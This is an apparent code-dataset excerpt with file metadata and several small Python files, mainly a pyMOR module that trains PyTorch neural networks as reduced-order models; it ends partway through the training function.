| 47
| 70
| 0.670213
|
h = float(input('Enter the height (m) of your wall:\n'))
c = float(input('Enter the length (m) of your wall:\n'))
print(f'Your wall has an area of {c*h}m² and will use {c*h/2}L of paint!')
| true
| true
|
1c3ea98a7585fb03beb4e762dac750a21ae4a86a
| 119
|
py
|
Python
|
projects/thesis/continuous/custom/continuous/deform_feature/__init__.py
|
cpark90/rrrcnn
|
ba66cc391265be76fa3896b66459ff7241b47972
|
[
"Apache-2.0"
] | null | null | null |
projects/thesis/continuous/custom/continuous/deform_feature/__init__.py
|
cpark90/rrrcnn
|
ba66cc391265be76fa3896b66459ff7241b47972
|
[
"Apache-2.0"
] | null | null | null |
projects/thesis/continuous/custom/continuous/deform_feature/__init__.py
|
cpark90/rrrcnn
|
ba66cc391265be76fa3896b66459ff7241b47972
|
[
"Apache-2.0"
] | null | null | null |
from .deform_feature_map_layer import *
from .deform_orienation_layer import *
from .deformable_by_grad_layer import *
| 29.75
| 39
| 0.848739
|
from .deform_feature_map_layer import *
from .deform_orienation_layer import *
from .deformable_by_grad_layer import *
| true
| true
|
1c3ea9de3eb93f5c90083da7512d23246cd1b525
| 171
|
py
|
Python
|
tests/project_awesome/b_module.py
|
ldiary/importlazy
|
0af9ee818428f6e9e79fb9391b05063e66a00ecd
|
[
"MIT"
] | null | null | null |
tests/project_awesome/b_module.py
|
ldiary/importlazy
|
0af9ee818428f6e9e79fb9391b05063e66a00ecd
|
[
"MIT"
] | null | null | null |
tests/project_awesome/b_module.py
|
ldiary/importlazy
|
0af9ee818428f6e9e79fb9391b05063e66a00ecd
|
[
"MIT"
] | null | null | null |
class BModuleClassOne:
class1_attribute = "Attribute of Class One in module B."
class BModuleClassTwo:
class2_attribute = "Attribute of Class Two in module B."
| 21.375
| 60
| 0.748538
|
class BModuleClassOne:
class1_attribute = "Attribute of Class One in module B."
class BModuleClassTwo:
class2_attribute = "Attribute of Class Two in module B."
| true
| true
|
1c3eaa7ea6c3c365dda9d17a0d39853324bddd4f
| 1,030
|
py
|
Python
|
tests/test_otscraper.py
|
LSDtopotools/lsdviztools
|
b6012c0013bea7a0af5e7fa283a8a2268be18e25
|
[
"MIT"
] | 2
|
2021-04-01T13:24:49.000Z
|
2021-09-15T17:24:19.000Z
|
tests/test_otscraper.py
|
LSDtopotools/lsdviztools
|
b6012c0013bea7a0af5e7fa283a8a2268be18e25
|
[
"MIT"
] | 20
|
2020-07-28T11:10:36.000Z
|
2021-08-19T13:10:44.000Z
|
tests/test_otscraper.py
|
LSDtopotools/lsdviztools
|
b6012c0013bea7a0af5e7fa283a8a2268be18e25
|
[
"MIT"
] | 2
|
2021-04-21T17:40:14.000Z
|
2021-09-15T17:24:20.000Z
|
#!/usr/bin/env python
'''
A script for testing the ot_scraper object
Simon Mudd
06/07/2020
'''
import lsdviztools.lsdbasemaptools as bmt
from lsdviztools.lsdplottingtools import lsdmap_gdalio as gio
import lsdviztools.lsdplottingtools as lsdplt
import rasterio as rio
import numpy as np
import lsdviztools.lsdmapwrappers as lsdmw
def test_01():
this_DEM = bmt.ot_scraper()
this_DEM.print_parameters()
this_DEM.download_pythonic()
this_DEM.to_UTM_pythonic()
def test_02():
RasterFile = "CP_SRTM30_UTM.tif"
DataDirectory = "./"
gio.convert2bil(DataDirectory, RasterFile,minimum_elevation=0.1)
gio.write_hillshade_bil(DataDirectory, RasterFile)
def test_03():
SB_DEM = bmt.ot_scraper(source = "SRTM30",longitude_W = -120.464655, longitude_E = -120.254214, latitude_S = 34.440538, latitude_N = 34.610770,prefix = "CP")
SB_DEM.print_parameters()
SB_DEM.download_pythonic()
SB_DEM.to_UTM_pythonic()
if __name__ == "__main__":
test_03()
test_02()
#run_tests_2()
| 21.914894
| 161
| 0.737864
|
import lsdviztools.lsdbasemaptools as bmt
from lsdviztools.lsdplottingtools import lsdmap_gdalio as gio
import lsdviztools.lsdplottingtools as lsdplt
import rasterio as rio
import numpy as np
import lsdviztools.lsdmapwrappers as lsdmw
def test_01():
this_DEM = bmt.ot_scraper()
this_DEM.print_parameters()
this_DEM.download_pythonic()
this_DEM.to_UTM_pythonic()
def test_02():
RasterFile = "CP_SRTM30_UTM.tif"
DataDirectory = "./"
gio.convert2bil(DataDirectory, RasterFile,minimum_elevation=0.1)
gio.write_hillshade_bil(DataDirectory, RasterFile)
def test_03():
SB_DEM = bmt.ot_scraper(source = "SRTM30",longitude_W = -120.464655, longitude_E = -120.254214, latitude_S = 34.440538, latitude_N = 34.610770,prefix = "CP")
SB_DEM.print_parameters()
SB_DEM.download_pythonic()
SB_DEM.to_UTM_pythonic()
if __name__ == "__main__":
test_03()
test_02()
| true
| true
|
1c3eaac3076c50b3e4bc856465dc5a85d4547c31
| 49,441
|
py
|
Python
|
src/pymor/reductors/neural_network.py
|
ullmannsven/pymor
|
407103ec50efa45d933f0c973314a4d511cae792
|
[
"Unlicense"
] | null | null | null |
src/pymor/reductors/neural_network.py
|
ullmannsven/pymor
|
407103ec50efa45d933f0c973314a4d511cae792
|
[
"Unlicense"
] | 14
|
2022-01-05T09:25:11.000Z
|
2022-03-31T17:07:10.000Z
|
src/pymor/reductors/neural_network.py
|
ullmannsven/pymor
|
407103ec50efa45d933f0c973314a4d511cae792
|
[
"Unlicense"
] | null | null | null |
# This file is part of the pyMOR project (https://www.pymor.org).
# Copyright pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (https://opensource.org/licenses/BSD-2-Clause)
from pymor.core.config import config
config.require('TORCH')
from numbers import Number
import inspect
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils as utils
from pymor.algorithms.pod import pod
from pymor.algorithms.projection import project
from pymor.core.base import BasicObject
from pymor.core.exceptions import NeuralNetworkTrainingFailed
from pymor.core.logger import getLogger
from pymor.models.neural_network import (FullyConnectedNN, NeuralNetworkModel,
NeuralNetworkStatefreeOutputModel,
NeuralNetworkInstationaryModel,
NeuralNetworkInstationaryStatefreeOutputModel)
class NeuralNetworkReductor(BasicObject):
"""Reduced Basis reductor relying on artificial neural networks.
This is a reductor that constructs a reduced basis using proper
orthogonal decomposition and trains a neural network that approximates
the mapping from parameter space to coefficients of the full-order
solution in the reduced basis.
The approach is described in :cite:`HU18`.
Parameters
----------
fom
The full-order |Model| to reduce.
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
basis_size
Desired size of the reduced basis. If `None`, rtol, atol or l2_err must
be provided.
rtol
Relative tolerance the basis should guarantee on the training set.
atol
Absolute tolerance the basis should guarantee on the training set.
l2_err
L2-approximation error the basis should not exceed on the training
set.
pod_params
Dict of additional parameters for the POD-method.
ann_mse
If `'like_basis'`, the mean squared error of the neural network on
the training set should not exceed the error of projecting onto the basis.
If `None`, the neural network with smallest validation error is
used to build the ROM.
If a tolerance is prescribed, the mean squared error of the neural
network on the training set should not exceed this threshold.
Training is interrupted if a neural network that undercuts the
error tolerance is found.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
basis_size=None, rtol=0., atol=0., l2_err=0., pod_params={},
ann_mse='like_basis', scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def reduce(self, hidden_layers='[(N+P)*3, (N+P)*3]', activation_function=torch.tanh,
optimizer=optim.LBFGS, epochs=1000, batch_size=20, learning_rate=1.,
loss_function=None, restarts=10, lr_scheduler=optim.lr_scheduler.StepLR,
lr_scheduler_params={'step_size': 10, 'gamma': 0.7},
es_scheduler_params={'patience': 10, 'delta': 0.}, weight_decay=0.,
log_loss_frequency=0, seed=0):
"""Reduce by training artificial neural networks.
Parameters
----------
hidden_layers
Number of neurons in the hidden layers. Can either be fixed or
a Python expression string depending on the reduced basis size
respectively output dimension `N` and the total dimension of
the |Parameters| `P`.
activation_function
Activation function to use between the hidden layers.
optimizer
Algorithm to use as optimizer during training.
epochs
Maximum number of epochs for training.
batch_size
Batch size to use if optimizer allows mini-batching.
learning_rate
Step size to use in each optimization step.
loss_function
Loss function to use for training. If `'weighted MSE'`, a weighted
mean squared error is used as loss function, where the weights are
given as the singular values of the corresponding reduced basis
functions. If `None`, the usual mean squared error is used.
restarts
Number of restarts of the training algorithm. Since the training
results highly depend on the initial starting point, i.e. the
initial weights and biases, it is advisable to train multiple
neural networks by starting with different initial values and
choose that one performing best on the validation set.
lr_scheduler
Algorithm to use as learning rate scheduler during training.
If `None`, no learning rate scheduler is used.
lr_scheduler_params
A dictionary of additional parameters passed to the init method of
the learning rate scheduler. The possible parameters depend on the
chosen learning rate scheduler.
es_scheduler_params
A dictionary of additional parameters passed to the init method of
the early stopping scheduler. For the possible parameters,
see :class:`EarlyStoppingScheduler`.
weight_decay
Weighting parameter for the l2-regularization of the weights and
biases in the neural network. This regularization is not available
for all optimizers; see the PyTorch documentation for more details.
log_loss_frequency
Frequency of epochs in which to log the current validation and
training loss during training of the neural networks.
If `0`, no intermediate logging of losses is done.
seed
Seed to use for various functions in PyTorch. Using a fixed seed,
it is possible to reproduce former results.
Returns
-------
rom
Reduced-order |NeuralNetworkModel|.
"""
assert restarts > 0
assert epochs > 0
assert batch_size > 0
assert learning_rate > 0.
assert weight_decay >= 0.
# set a seed for the PyTorch initialization of weights and biases
# and further PyTorch methods
torch.manual_seed(seed)
# build a reduced basis using POD and compute training data
if not hasattr(self, 'training_data'):
self.compute_training_data()
layer_sizes = self._compute_layer_sizes(hidden_layers)
# compute validation data
if not hasattr(self, 'validation_data'):
with self.logger.block('Computing validation snapshots ...'):
if self.validation_set:
self.validation_data = []
for mu in self.validation_set:
sample = self._compute_sample(mu)
self.validation_data.extend(sample)
else:
number_validation_snapshots = int(len(self.training_data)*self.validation_ratio)
# randomly shuffle training data before splitting into two sets
np.random.shuffle(self.training_data)
# split training data into validation and training set
self.validation_data = self.training_data[0:number_validation_snapshots]
self.training_data = self.training_data[number_validation_snapshots+1:]
# run the actual training of the neural network
with self.logger.block('Training of neural network ...'):
target_loss = self._compute_target_loss()
# set parameters for neural network and training
neural_network_parameters = {'layer_sizes': layer_sizes,
'activation_function': activation_function}
if loss_function == 'weighted MSE':
if hasattr(self, 'weights'):
weights = self.weights
def weighted_mse_loss_function(inputs, targets):
return (weights * (inputs - targets) ** 2).mean()
loss_function = weighted_mse_loss_function
self.logger.info('Using weighted MSE loss function ...')
else:
raise RuntimeError('No weights for weighted MSE loss available!')
training_parameters = {'optimizer': optimizer, 'epochs': epochs,
'batch_size': batch_size, 'learning_rate': learning_rate,
'lr_scheduler': lr_scheduler, 'lr_scheduler_params': lr_scheduler_params,
'es_scheduler_params': es_scheduler_params, 'weight_decay': weight_decay,
'loss_function': loss_function}
self.logger.info('Initializing neural network ...')
# initialize the neural network
neural_network = FullyConnectedNN(**neural_network_parameters).double()
# run training algorithm with multiple restarts
self.neural_network, self.losses = multiple_restarts_training(self.training_data, self.validation_data,
neural_network, target_loss, restarts,
log_loss_frequency, training_parameters,
self.scaling_parameters, seed)
self._check_tolerances()
return self._build_rom()
def compute_training_data(self):
"""Compute a reduced basis using proper orthogonal decomposition."""
# compute snapshots for POD and training of neural networks
with self.logger.block('Computing training snapshots ...'):
U = self.fom.solution_space.empty()
for mu in self.training_set:
U.append(self.fom.solve(mu))
# compute reduced basis via POD
with self.logger.block('Building reduced basis ...'):
self.reduced_basis, svals = pod(U, modes=self.basis_size, rtol=self.rtol / 2.,
atol=self.atol / 2., l2_err=self.l2_err / 2.,
**(self.pod_params or {}))
# compute training samples
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu, u in zip(self.training_set, U):
sample = self._compute_sample(mu, u)
# compute minimum and maximum of outputs/targets for scaling
self._update_scaling_parameters(sample)
self.training_data.extend(sample)
# set singular values as weights for the weighted MSE loss
self.weights = torch.Tensor(svals)
# compute mean square loss
self.mse_basis = (sum(U.norm2()) - sum(svals**2)) / len(U)
def _update_scaling_parameters(self, sample):
assert len(sample) == 2 or (len(sample) == 1 and len(sample[0]) == 2)
if len(sample) == 1:
sample = sample[0]
def prepare_datum(datum):
if not (isinstance(datum, torch.DoubleTensor) or isinstance(datum, np.ndarray)):
return datum.to_numpy()
return datum
sample = (torch.DoubleTensor(prepare_datum(sample[0])), torch.DoubleTensor(prepare_datum(sample[1])))
if self.scale_inputs:
if self.scaling_parameters['min_inputs'] is not None:
self.scaling_parameters['min_inputs'] = torch.min(self.scaling_parameters['min_inputs'], sample[0])
else:
self.scaling_parameters['min_inputs'] = sample[0]
if self.scaling_parameters['max_inputs'] is not None:
self.scaling_parameters['max_inputs'] = torch.max(self.scaling_parameters['max_inputs'], sample[0])
else:
self.scaling_parameters['max_inputs'] = sample[0]
if self.scale_outputs:
if self.scaling_parameters['min_targets'] is not None:
self.scaling_parameters['min_targets'] = torch.min(self.scaling_parameters['min_targets'],
sample[1])
else:
self.scaling_parameters['min_targets'] = sample[1]
if self.scaling_parameters['max_targets'] is not None:
self.scaling_parameters['max_targets'] = torch.max(self.scaling_parameters['max_targets'],
sample[1])
else:
self.scaling_parameters['max_targets'] = sample[1]
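# Note (editorial addition): the componentwise minima and maxima collected here
# are consumed later in `train_neural_network`, where inputs (and, if enabled,
# targets) are rescaled to [0, 1] via (value - min) / (max - min).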
def _compute_sample(self, mu, u=None):
"""Transform parameter and corresponding solution to |NumPy arrays|."""
# determine the coefficients of the full-order solutions in the reduced basis to obtain
# the training data
if u is None:
u = self.fom.solve(mu)
product = self.pod_params.get('product')
return [(mu, self.reduced_basis.inner(u, product=product)[:, 0])]
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network."""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': len(self.reduced_basis), 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the reduced basis size
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim, ] + hidden_layers + [len(self.reduced_basis), ]
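# Worked example (editorial addition; values invented): with a reduced basis of
# size N=10 and a P=2 dimensional parameter space, the default string
# '[(N+P)*3, (N+P)*3]' evaluates to [36, 36], so the resulting layer sizes are
# [2, 36, 36, 10].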
def _compute_target_loss(self):
"""Compute target loss depending on value of `ann_mse`."""
target_loss = None
if isinstance(self.ann_mse, Number):
target_loss = self.ann_mse
elif self.ann_mse == 'like_basis':
target_loss = self.mse_basis
return target_loss
def _check_tolerances(self):
"""Check if trained neural network is sufficient to guarantee certain error bounds."""
with self.logger.block('Checking tolerances for error of neural network ...'):
if isinstance(self.ann_mse, Number):
if self.losses['full'] > self.ann_mse:
raise NeuralNetworkTrainingFailed('Could not train a neural network that '
'guarantees prescribed tolerance!')
elif self.ann_mse == 'like_basis':
if self.losses['full'] > self.mse_basis:
raise NeuralNetworkTrainingFailed('Could not train a neural network with an error as small as '
'the reduced basis error! Maybe you can try a different '
'neural network architecture or change the value of '
'`ann_mse`.')
elif self.ann_mse is None:
self.logger.info('Using neural network with smallest validation error ...')
self.logger.info(f'Finished training with a validation loss of {self.losses["val"]} ...')
else:
raise ValueError('Unknown value for mean squared error of neural network')
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
projected_output_functional = project(self.fom.output_functional, None, self.reduced_basis)
rom = NeuralNetworkModel(self.neural_network, parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
output_functional=projected_output_functional,
name=f'{self.fom.name}_reduced')
return rom
def reconstruct(self, u):
"""Reconstruct high-dimensional vector from reduced vector `u`."""
assert hasattr(self, 'reduced_basis')
return self.reduced_basis.lincomb(u.to_numpy())
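# Usage sketch (editorial addition, illustrative only): one way the reductor above
# could be driven. `fom` and `parameter_space` are assumed to be a parametric pyMOR
# model and its parameter space; all sample counts and keyword values below are
# arbitrary placeholders.
def _example_neural_network_reduction(fom, parameter_space):
    training_set = parameter_space.sample_uniformly(10)
    validation_set = parameter_space.sample_randomly(20)
    reductor = NeuralNetworkReductor(fom, training_set, validation_set,
                                     basis_size=10, ann_mse=None)
    rom = reductor.reduce(restarts=5, log_loss_frequency=10)
    mu = parameter_space.sample_randomly(1)[0]
    u_reduced = rom.solve(mu)
    return reductor.reconstruct(u_reduced)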
class NeuralNetworkStatefreeOutputReductor(NeuralNetworkReductor):
"""Output reductor relying on artificial neural networks.
This is a reductor that trains a neural network that approximates
the mapping from parameter space to output space.
Parameters
----------
fom
The full-order |Model| to reduce.
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
validation_loss
The validation loss to reach during training. If `None`, the neural
network with the smallest validation loss is returned.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
validation_loss=None, scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
"""Compute the training samples (the outputs to the parameters of the training set)."""
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu in self.training_set:
sample = self._compute_sample(mu)
self._update_scaling_parameters(sample)
self.training_data.extend(sample)
def _compute_sample(self, mu):
"""Transform parameter and corresponding output to tensors."""
return [(mu, self.fom.output(mu).flatten())]
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network."""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': self.fom.dim_output, 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the output dimension
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim, ] + hidden_layers + [self.fom.dim_output, ]
def _compute_target_loss(self):
"""Compute target loss depending on value of `ann_mse`."""
return self.validation_loss
def _check_tolerances(self):
"""Check if trained neural network is sufficient to guarantee certain error bounds."""
self.logger.info('Using neural network with smallest validation error ...')
self.logger.info(f'Finished training with a validation loss of {self.losses["val"]} ...')
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
rom = NeuralNetworkStatefreeOutputModel(self.neural_network, parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
name=f'{self.fom.name}_output_reduced')
return rom
class NeuralNetworkInstationaryReductor(NeuralNetworkReductor):
"""Reduced Basis reductor for instationary problems relying on artificial neural networks.
This is a reductor that constructs a reduced basis using proper
orthogonal decomposition and trains a neural network that approximates
the mapping from parameter and time space to coefficients of the
full-order solution in the reduced basis.
The approach is described in :cite:`WHR19`.
Parameters
----------
fom
The full-order |Model| to reduce.
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
basis_size
Desired size of the reduced basis. If `None`, rtol, atol or l2_err must
be provided.
rtol
Relative tolerance the basis should guarantee on the training set.
atol
Absolute tolerance the basis should guarantee on the training set.
l2_err
L2-approximation error the basis should not exceed on the training
set.
pod_params
Dict of additional parameters for the POD-method.
ann_mse
If `'like_basis'`, the mean squared error of the neural network on
the training set should not exceed the error of projecting onto the basis.
If `None`, the neural network with smallest validation error is
used to build the ROM.
If a tolerance is prescribed, the mean squared error of the neural
network on the training set should not exceed this threshold.
Training is interrupted if a neural network that undercuts the
error tolerance is found.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
basis_size=None, rtol=0., atol=0., l2_err=0., pod_params={},
ann_mse='like_basis', scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
"""Compute a reduced basis using proper orthogonal decomposition."""
# compute snapshots for POD and training of neural networks
with self.logger.block('Computing training snapshots ...'):
U = self.fom.solution_space.empty()
for mu in self.training_set:
u = self.fom.solve(mu)
if hasattr(self, 'nt'):
assert self.nt == len(u)
else:
self.nt = len(u)
U.append(u)
# compute reduced basis via POD
with self.logger.block('Building reduced basis ...'):
self.reduced_basis, svals = pod(U, modes=self.basis_size, rtol=self.rtol / 2.,
atol=self.atol / 2., l2_err=self.l2_err / 2.,
**(self.pod_params or {}))
# compute training samples
with self.logger.block('Computing training samples ...'):
self.training_data = []
for i, mu in enumerate(self.training_set):
samples = self._compute_sample(mu, U[i*self.nt:(i+1)*self.nt])
for sample in samples:
self._update_scaling_parameters(sample)
self.training_data.extend(samples)
# set singular values as weights for the weighted MSE loss
self.weights = torch.Tensor(svals)
# compute mean square loss
self.mse_basis = (sum(U.norm2()) - sum(svals**2)) / len(U)
def _compute_sample(self, mu, u=None):
"""Transform parameter and corresponding solution to |NumPy arrays|.
This function takes care of including the time instances in the inputs.
"""
if u is None:
u = self.fom.solve(mu)
parameters_with_time = [mu.with_(t=t) for t in np.linspace(0, self.fom.T, self.nt)]
product = self.pod_params.get('product')
samples = [(mu, self.reduced_basis.inner(u_t, product=product)[:, 0])
for mu, u_t in zip(parameters_with_time, u)]
return samples
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network
(make sure to increase the input dimension to account for the time).
"""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': len(self.reduced_basis), 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the reduced basis size
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim + 1, ] + hidden_layers + [len(self.reduced_basis), ]
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
projected_output_functional = project(self.fom.output_functional, None, self.reduced_basis)
rom = NeuralNetworkInstationaryModel(self.fom.T, self.nt, self.neural_network,
parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
output_functional=projected_output_functional,
name=f'{self.fom.name}_reduced')
return rom
class NeuralNetworkInstationaryStatefreeOutputReductor(NeuralNetworkStatefreeOutputReductor):
"""Output reductor relying on artificial neural networks.
This is a reductor that trains a neural network that approximates
the mapping from parameter space to output space.
Parameters
----------
fom
The full-order |Model| to reduce.
nt
Number of time steps in the reduced order model (does not have to
coincide with the number of time steps in the full order model).
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
validation_loss
The validation loss to reach during training. If `None`, the neural
network with the smallest validation loss is returned.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, nt, training_set, validation_set=None, validation_ratio=0.1,
validation_loss=None, scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
"""Compute the training samples (the outputs to the parameters of the training set)."""
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu in self.training_set:
samples = self._compute_sample(mu)
for sample in samples:
self._update_scaling_parameters(sample)
self.training_data.extend(samples)
def _compute_sample(self, mu):
"""Transform parameter and corresponding output to |NumPy arrays|.
This function takes care of including the time instances in the inputs.
"""
output_trajectory = self.fom.output(mu)
output_size = output_trajectory.shape[0]
samples = [(mu.with_(t=t), output.flatten())
for t, output in zip(np.linspace(0, self.fom.T, output_size), output_trajectory)]
return samples
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network."""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': self.fom.dim_output, 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the output dimension
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim + 1, ] + hidden_layers + [self.fom.dim_output, ]
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
rom = NeuralNetworkInstationaryStatefreeOutputModel(self.fom.T, self.nt, self.neural_network,
parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
name=f'{self.fom.name}_output_reduced')
return rom
class EarlyStoppingScheduler(BasicObject):
"""Class for performing early stopping in training of neural networks.
If the validation loss does not decrease over a certain number of epochs, the
training should be aborted to avoid overfitting the training data.
This class implements an early stopping scheduler that recommends to stop the
training process if the validation loss did not decrease by at least `delta`
over `patience` epochs.
Parameters
----------
size_training_validation_set
Combined size of the training and validation set.
patience
Number of epochs of non-decreasing validation loss allowed before the
training process is stopped early.
delta
Minimal amount of decrease in the validation loss that is required to reset
the counter of non-decreasing epochs.
"""
def __init__(self, size_training_validation_set, patience=10, delta=0.):
self.__auto_init(locals())
self.best_losses = None
self.best_neural_network = None
self.counter = 0
def __call__(self, losses, neural_network=None):
"""Returns `True` if early stopping of training is suggested.
Parameters
----------
losses
Dictionary of losses on the validation and the training set in
the current epoch.
neural_network
Neural network that produces the current validation loss.
Returns
-------
`True` if early stopping is suggested, `False` otherwise.
"""
if self.best_losses is None:
self.best_losses = losses
self.best_losses['full'] /= self.size_training_validation_set
self.best_neural_network = neural_network
elif self.best_losses['val'] - self.delta <= losses['val']:
self.counter += 1
if self.counter >= self.patience:
return True
else:
self.best_losses = losses
self.best_losses['full'] /= self.size_training_validation_set
self.best_neural_network = neural_network
self.counter = 0
return False
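# Behavioural sketch (editorial addition, illustrative only): the scheduler is
# queried once per epoch with the current loss dictionary and network; it returns
# `True` as soon as the validation loss has failed to improve by more than `delta`
# for `patience` consecutive epochs. The loop only demonstrates the calling
# convention; in practice the losses come from an actual training loop.
def _example_early_stopping(epoch_losses, neural_network):
    scheduler = EarlyStoppingScheduler(size_training_validation_set=120, patience=3)
    for losses in epoch_losses:  # each entry e.g. {'full': 1.0, 'train': 0.7, 'val': 0.3}
        if scheduler(losses, neural_network):
            break  # early stopping suggested
    return scheduler.best_neural_network, scheduler.best_losses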
class CustomDataset(utils.data.Dataset):
"""Class that represents the dataset to use in PyTorch.
Parameters
----------
training_data
Set of training parameters and the respective coefficients of the
solution in the reduced basis.
"""
def __init__(self, training_data):
self.training_data = training_data
def __len__(self):
return len(self.training_data)
def __getitem__(self, idx):
t = self.training_data[idx]
return t
def train_neural_network(training_data, validation_data, neural_network,
training_parameters={}, scaling_parameters={}, log_loss_frequency=0):
"""Training algorithm for artificial neural networks.
Trains a single neural network using the given training and validation data.
Parameters
----------
training_data
Data to use during the training phase. Has to be a list of tuples,
where each tuple consists of two elements that are either
PyTorch-tensors (`torch.DoubleTensor`) or |NumPy arrays| or pyMOR data
structures that have `to_numpy()` implemented.
The first element contains the input data, the second element contains
the target values.
validation_data
Data to use during the validation phase. Has to be a list of tuples,
where each tuple consists of two elements that are either
PyTorch-tensors (`torch.DoubleTensor`) or |NumPy arrays| or pyMOR data
structures that have `to_numpy()` implemented.
The first element contains the input data, the second element contains
the target values.
neural_network
The neural network to train (can also be a pre-trained model).
Has to be a PyTorch-Module.
training_parameters
Dictionary with additional parameters for the training routine like
the type of the optimizer, the (maximum) number of epochs, the batch
size, the learning rate or the loss function to use.
Possible keys are `'optimizer'` (an optimizer from the PyTorch `optim`
package; if not provided, the LBFGS-optimizer is taken as default),
`'epochs'` (an integer that determines the number of epochs to use
for training the neural network (if training is not interrupted
prematurely due to early stopping); if not provided, 1000 is taken as
default value), `'batch_size'` (an integer that determines the number
of samples to pass to the optimizer at once; if not provided, 20 is
taken as default value; not used in the case of the LBFGS-optimizer
since LBFGS does not support mini-batching), `'learning_rate'` (a
positive real number used as the (initial) step size of the optimizer;
if not provided, 1 is taken as default value), `'loss_function'`
(a loss function from PyTorch; if not provided, the MSE loss is taken
as default), `'lr_scheduler'` (a learning rate scheduler from the
PyTorch `optim.lr_scheduler` package; if not provided or `None`,
no learning rate scheduler is used), `'lr_scheduler_params'`
(a dictionary of additional parameters for the learning rate
scheduler), `'es_scheduler_params'` (a dictionary of additional
parameters for the early stopping scheduler), and `'weight_decay'`
(non-negative real number that determines the strength of the
l2-regularization; if not provided or 0., no regularization is applied).
An example dictionary is sketched right after this function.
scaling_parameters
Dict of tensors that determine how to scale inputs before passing them
through the neural network and outputs after obtaining them from the
neural network. If not provided or each entry is `None`, no scaling is
applied. Required keys are `'min_inputs'`, `'max_inputs'`, `'min_targets'`,
and `'max_targets'`.
log_loss_frequency
Frequency of epochs in which to log the current validation and
training loss. If `0`, no intermediate logging of losses is done.
Returns
-------
best_neural_network
The best trained neural network with respect to validation loss.
losses
The corresponding losses as a dictionary with keys `'full'` (for the
full loss containing the training and the validation average loss),
`'train'` (for the average loss on the training set), and `'val'`
(for the average loss on the validation set).
"""
assert isinstance(neural_network, nn.Module)
assert isinstance(log_loss_frequency, int)
for data in training_data, validation_data:
assert isinstance(data, list)
assert all(isinstance(datum, tuple) and len(datum) == 2 for datum in data)
def prepare_datum(datum):
if not (isinstance(datum, torch.DoubleTensor) or isinstance(datum, np.ndarray)):
return datum.to_numpy()
return datum
